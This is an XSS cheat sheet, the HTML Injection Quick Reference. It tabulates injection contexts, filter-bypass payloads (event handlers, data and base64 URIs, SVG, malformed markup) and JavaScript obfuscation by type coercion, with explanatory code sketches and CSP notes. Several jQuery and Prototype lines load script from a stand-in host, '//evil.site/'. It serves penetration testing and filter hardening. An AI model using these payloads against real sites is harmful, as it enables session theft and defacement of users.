HTML Injection Quick Reference (HIQR)

Mike Shema, Deadliest Web Attacks
Repository: HIQR @ GitHub

Table 1: Injection Techniques for Various Parsing Contexts
Table 2: Payload Crafting Techniques to Bypass Filters and Data Validation
Table 3: JavaScript Compositions for Manipulation & Obfuscation

Injection Techniques for Various Parsing Contexts1
Context State Injection Example
Data State
(Text node, open tag)
Welcome back, <script>☣</script>...
</element> <title>Search Results for '</title><script>☣</script>'</title>
-->2 <!-- lorem ipsum--><script>☣</script>-->
]]> <FOO><![CDATA[]]><script>☣</script>]]>
Attribute value Unquoted <input type=text name=foo value=a><script>☣</script>>
<input type=text name=foo value=a/><script>☣</script>>
Single-quoted
(U+0027)
<input type=text name=foo value=''onevent=☣//'>
Double-quoted
(U+0022)
<input type=text name=foo value=""onevent=☣//">
JavaScript variable assignment Unquoted
Double-quoted
(U+0022)
<script>
var foo="";☣;//";
...
Single-quoted
(U+0027)
<script>
var foo='';☣;//';
...
Escape characters (blog post)
JavaScript Window.location object property
.hash
.href
.pathname
.search
URL https://web.site/page/<script>☣</script>
<script>
document.write("Page not found: " + window.location);
...
#fragment https://web.site/page#<script>☣</script>
<script>
document.write(window.location);
...
#jQuery3 https://web.site/page#<img/src=%22%22onerror=☣>
<script>
$(document).ready(function() {
  var x = (window.location.hash.match(/^#([^\/].+)$/) || [])[1];
  var w = $('a[name="' + x + '"], [id="' + x + '"]');
});
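The #jQuery row can be traced outside a browser. The following is a minimal sketch, assuming a hard-coded fragment in place of window.location.hash; whether %22 is decoded before the script sees it varies by browser, so the sketch decodes it explicitly. The variable names hash and selectorArg are illustrative only.

```javascript
// Hypothetical fragment, as it might follow "https://web.site/page".
// The biohazard symbol stands for the payload, as elsewhere in this reference.
const hash = decodeURIComponent('#<img/src=%22%22onerror=☣>');

// Same pattern as the page above: capture everything after '#' as long as
// the first character is not a forward slash.
const x = (hash.match(/^#([^\/].+)$/) || [])[1];

// The captured text is concatenated into what is meant to be a selector.
const selectorArg = 'a[name="' + x + '"], [id="' + x + '"]';

console.log(x);
console.log(selectorArg);
```

The regular expression does nothing to exclude markup, so the string handed to $() contains a complete img element. Older jQuery releases could treat a string containing markup as HTML to be created rather than as a selector to be matched.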
Footnotes
1 The biohazard symbol (U+2623) -- ☣ -- in each example represents a JavaScript payload. It could be anything from a while loop to DoS the browser, e.g. var a;while(1){a+="a"} to the ubiquitous alert(9). One of the safest payloads to use is console.log(id) where the id is a unique identifier. Not only is a log message unobtrusive, but the identifier helps identify when an injection point and reflection point are on different resources. In any case, these categories focus on the placement of the payload within the rendered document rather than the nature of the payload's execution.
Though it seems daunting to review the HTML5 syntax specification, doing so aids in understanding how HTML is supposed to be formed. HTML5 defines an explicit algorithm for parsing HTML documents. Read through the spec to become familiar with the expectations of Unicode code points, parse errors, and decisions a User Agent may make when dealing with markup. A standardized approach to parsing is supposed to minimize the quirks and differences among browsers, thus removing a historical source of insecurity. The HTML4 spec was neither as clear nor as rigorous on parsing.
2 Sometimes it's helpful to insert a space before the --> to ensure the tag is interpreted. [ HTML5 comments ]
3 This is a quirk of jQuery's design choice for overloading the $() API to accept selectors or elements.
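Footnote 1 recommends console.log(id) with a unique identifier as a payload. The following is a minimal sketch of a probe generator along those lines. The function names makePayload and makeProbes, the hiqr prefix, and the choice of onfocus as the event handler are all assumptions made for illustration. The identifier is written as a regex literal so the payload needs no quotes of its own.

```javascript
let counter = 0;

// Return a quote-free payload: /id/.source evaluates to the string "id",
// so the same text can be placed in quoted and unquoted contexts.
function makePayload() {
  counter += 1;
  const id = 'hiqr' + counter.toString(36).padStart(4, '0');
  return { id, js: 'console.log(/' + id + '/.source)' };
}

// Wrap a fresh payload for a few of the parsing contexts in Table 1.
// onfocus is a stand-in; any event handler attribute could be substituted.
function makeProbes() {
  const wrappers = [
    ['data state', (js) => '<script>' + js + '</script>'],
    ['single-quoted attribute', (js) => "'onfocus=" + js + '//'],
    ['double-quoted attribute', (js) => '"onfocus=' + js + '//'],
    ['double-quoted JavaScript string', (js) => '";' + js + ';//'],
  ];
  return wrappers.map(([context, build]) => {
    const { id, js } = makePayload();
    return { context, id, probe: build(js) };
  });
}

const probes = makeProbes();
for (const p of probes) {
  console.log(p.id + '\t' + p.context + '\t' + p.probe);
}
```

Recording which identifier was sent to which parameter makes it possible to match a later console message to its injection point, even when the reflection appears on a different resource.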

Payload Crafting Techniques to Bypass Filters and Data Validation
Concept Notes Payload Example
Alternate attribute delimiters Forward slash <img/src=""onerror=alert(9)>
Dangling quoted string <a'' href'' onclick=alert(9)>foo</a>
<a"" href=""onclick=alert(9)>foo</a>
CRLF instead of space <img%0d%0asrc=""%0d%0aonerror=alert(9)>
HTML entity encoding JavaScript scheme
(Decimal, hex, unicode hex)
<a href="java&#115;cript:alert(9)">foo</a>
<a href="java&#x73;cript:alert(9)">foo</a>
<a href="java&#x0073;cript:alert(9)">foo</a>
JavaScript inline event handlers1
[ html4 | html5 ]
Unquoted <input type=text name=foo value=a%20onchange=alert(9)>
Double-quoted <input type="text" name="foo" value=""onmouseover=alert(9)//">
Single-quoted <input type='text' name='foo' value=''onclick=alert(9)//'>
HTML5 autofocus <input type="text" name="foo" value=""autofocus/onfocus=alert(9)//">
Data URI handlers2 src & href attributes <a href="data:text/html,<script>alert(9)</script>">foo</a>
<script src="data:,alert(9)"></script>
<script src="data:application/x-javascript,alert(9)"></script>
<script src="data:text/javascript,alert(9)"></script>
Base64 data <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg">foo</a>
<script src="data:;base64,YWxlcnQoOSk"></script>
Alternate character sets <a href="data:text/html;charset=utf-16,
%ff%fe%3c%00s%00c%00r%00i%00p%00t%00%3e
%00a%00l%00e%00r%00t%00(%009%00)%00
<%00/%00s%00c%00r%00i%00p%00t%00>%00">foo</a>
Alternate markup SVG <svg onload="javascript:alert(9)" xmlns="http://www.w3.org/2000/svg"></svg>
<svg xmlns="http://www.w3.org/2000/svg">
<g onload="javascript:alert(9)"></g></svg>
<svg><script xlink:href=data:,alert(9)></script>
<svg xmlns="http://www.w3.org/2000/svg">
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(9)">
<rect width="1000" height="1000" fill="white"/></a></svg>
Untidy markup Missing greater-than sign <script%0d%0aalert(9)</script>
<script%20<!--%20-->alert(9)</script>
Recover from syntax error <a href=""&<img&amp;/onclick=alert(9)>foo</a>
<script/<a>alert(9)</script>
<script/<a>alert(9)</script </a>
Uncommon syntax <a""id=a href=''onclick=alert(9)>foo</a>
Orphan entity <a href=""&amp;/onclick=alert(9)>foo</a>
Vestigial attribute <script/id="a">alert(9)</script>
Anti-regex patterns Element closed prematurely <img src=">"onerror=alert(9)>
Element confusion <img id="><"class="><"src=">"onerror=alert(9)>
Quote confusion <img src="\"a=">"onerror=alert(9)>
<a id=' href="">'href=javascript:alert(9)>foo</a>
<a id='href=https://web.site/'onclick=alert(9)>foo</a>
<a href= . '"\' onclick=alert(9) '"'>foo</a>
Quote confusion with element <img src="\"'<a href='">"'onerror=alert(9)>
<a id='https://web.site/'onclick=alert(9)<!--href=a>foo</a>-->
Quote mixing with element <img src="'"id='<img src="">'onerror=alert(9)>
Recursive elements <img src="<img src='<img src=.>'>"onerror=alert(9)>
Repeated attributes (match last occurrence)3 <a href=javascript:alert(9) href href='' href="">foo</a>
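The anti-regex rows target filters that assume a tag ends at the first greater-than sign. The following is a minimal sketch of why the "Element closed prematurely" payload survives such a filter. Both functions are hypothetical and written only for this illustration; neither is taken from a real library.

```javascript
// Hypothetical filter: a tag is assumed to run from '<' to the first '>'.
function naiveStripTags(input) {
  return input.replace(/<[^>]*>/g, '');
}

// Hypothetical variant that skips over quoted attribute values before
// looking for the closing '>'.
function quoteAwareStripTags(input) {
  return input.replace(/<(?:[^>"']|"[^"]*"|'[^']*')*>/g, '');
}

const payload = '<img src=">"onerror=alert(9)>';

// The naive pattern stops at the '>' inside the quoted src value, so the
// event handler is left behind in the output.
console.log(naiveStripTags(payload));

// The quote-aware pattern consumes the whole element for this payload.
console.log(quoteAwareStripTags(payload));
```

The quote-aware pattern handles this one payload, but it is still a regular expression and not an HTML parser. The other rows in this group exist because each added rule tends to create a new mismatch between the filter and the browser.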
Footnotes
1 Content Security Policy (CSP) headers can neutralize these attacks by preventing the User Agent from executing inline JavaScript, including event handler attributes, unless the page author is forced to include the "unsafe-inline" keyword in the policy.
2 The basic format is dataurl := "data:" [ mediatype ] [ ";base64" ] "," data. The scheme is defined in RFC 2397.
3 Per HTML5 spec, "When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute's name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any)."
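The data URL format in footnote 2 can be checked against the payloads in the table. The following is a minimal sketch, assuming Node.js (Buffer is used for base64 decoding). The function name parseDataUrl is hypothetical, and the parsing is deliberately simplified compared with what a browser does.

```javascript
// Split a data URL following: "data:" [ mediatype ] [ ";base64" ] "," data
function parseDataUrl(url) {
  const m = /^data:([^,]*?)(;base64)?,(.*)$/is.exec(url);
  if (!m) return null;
  const isBase64 = Boolean(m[2]);
  // Buffer tolerates base64 without trailing '=' padding, as in the table.
  // decodeURIComponent throws on malformed percent-escapes.
  const body = isBase64
    ? Buffer.from(m[3], 'base64').toString('utf8')
    : decodeURIComponent(m[3]);
  // RFC 2397 default when the media type is omitted.
  const mediaType = m[1] || 'text/plain;charset=US-ASCII';
  return { mediaType, isBase64, body };
}

const examples = [
  'data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg',
  'data:;base64,YWxlcnQoOSk',
  'data:,alert(9)',
];

for (const url of examples) {
  console.log(parseDataUrl(url));
}
```

Decoding the base64 rows this way shows that they carry the same markup and script as the unencoded rows, which is why a filter that inspects only the literal attribute text may miss them.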

JavaScript Compositions for Manipulation & Obfuscation
Technique Notes Example
Concatenation String operators var a = "foo"+alert(9)//";
Logical operators var a = "foo"&&alert(9)//";
Mathematical operators var a = "foo"/alert(9)//";
Function execution Anonymous (function(){alert(9)})()
Method lookup window["alert"](9)
Strings String object String.fromCharCode(0x61,0x62)
Regex object source attribute alert(/foo bar/.source)
window[/alert/.source](9)
Harness functions from a JavaScript library Angular angular.bind(self, alert, 9)()
angular.element.apply(alert(9))
Ember JS Ember.run(null, alert, 9)
jQuery $.get('//evil.site/')
(site serves alert(9))
$.getScript('//evil.site/')
(site serves alert(9))
$('#main').load('//evil.site/');
(site serves <script>alert(9)</script> into selector, e.g. #main)
$.globalEval(alert(9))
Prototype
(Ajax will trigger CORS)
Prototype.K(alert)(9)
new Ajax.Request('//evil.site/')
(site serves alert(9) and CORS headers)
Underscore _.defer(alert, 9)
_.delay(alert, 0, 9)
_.once(alert(9))
Type coercion 1) Boolean + Object converts to String false + "" == "false"
![] + []
2) Extract character from String by index ( false + "" )[1] == "a"
( ![] + [] )[1]
3) Compose String from characters "alert"
(![]+[])[1] +
(![]+[])[2] +
(![]+[])[4] +
(!![]+[])[1] +
(!![]+[])[0]
4) Execute function by method lookup (window["alert"])(9)
(window["ale"+"rt"])(9)
(window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] +
(!![]+[])[1] + (!![]+[])[0]])(9)
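The four type coercion steps can be run end to end. The following is a minimal sketch, assuming Node.js, where globalThis plays the role of window. Node.js has no alert(), so a stand-in that records its argument is installed; the calls array is an assumption made for this illustration.

```javascript
// Steps 1 and 2: booleans coerced to strings, which can then be indexed.
const f = ![] + [];   // same value as false + ""
const t = !![] + [];  // same value as true + ""

// Step 3: pick characters by index to spell a function name.
const name = f[1] + f[2] + f[4] + t[1] + t[0];

// Step 4: method lookup on the global object. The stand-in below exists
// only so the sketch runs outside a browser.
const calls = [];
globalThis.alert = (value) => { calls.push(value); };

globalThis[name](9);            // name composed from coerced booleans
globalThis[/alert/.source](9);  // name taken from a regex literal
globalThis['ale' + 'rt'](9);    // name built by concatenation

console.log(name, calls);
```

None of the three calls contains the literal text alert( in sequence with a quoted string, which is the property that makes these compositions useful against filters that search for known function names.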

Creative Commons License
HTML Injection Quick Reference by Mike Shema is licensed under a Creative Commons Attribution 4.0 International License.